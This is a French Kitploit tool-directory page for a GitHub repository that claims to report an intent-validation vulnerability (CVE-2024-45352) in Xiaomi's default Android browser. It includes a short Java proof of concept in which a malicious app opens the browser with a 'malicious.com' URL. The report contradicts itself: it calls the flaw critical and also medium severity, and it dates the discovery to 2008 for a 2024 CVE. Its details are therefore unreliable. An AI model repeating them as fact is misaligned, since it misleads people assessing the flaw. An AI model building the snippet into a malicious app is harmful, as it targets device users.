Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
xiaomi-cve-2024-45352 — Rapport technique sur une vulnérabilité critique de Xiaomi | Kitploit
Outils/GitHubGitHub/edwins907/xiaomi-cve-2024-45352
Sécurité AndroidAnalyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité Mobile
GitHubedwins907/xiaomi-cve-2024-45352

xiaomi-cve-2024-45352

Rapport technique sur une vulnérabilité critique de Xiaomi

Voir le dépôt
3il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

xiaomi-cve-2024-45352

Rapport technique sur la vulnérabilité critique de Xiaomi Résumé de la vulnérabilité Une vulnérabilité a été découverte dans le navigateur par défaut de Xiaomi (com.android.browser) sur divers appareils MIUI. L'application ne valide pas correctement les intentions (intents) passées via startActivity, ce qui permet à des applications malveillantes d'ouvrir des URL arbitraires ou d'effectuer des actions non intentionnelles.

  • Identifiant CVE : CVE-2024-45352
  • Composant
  • :com.android.browser
  • Sévérité : Moyenne
  • Statut : Signalé à Xiaomi (en attente de confirmation)
  • Date de découverte : [24 avril 2008]

🔥 Preuve de concept (PoC)

  1. Créez une application malveillante simple avec l'intention suivante :
root@kitploit:~
Intent intent = new Intent();
intent.setComponent(new ComponentName("com.android.browser", "com.android.browser.BrowserActivity"));
intent.setData(Uri.parse("http://malicious.com"));
startActivity(intent);
Télécharger l’outil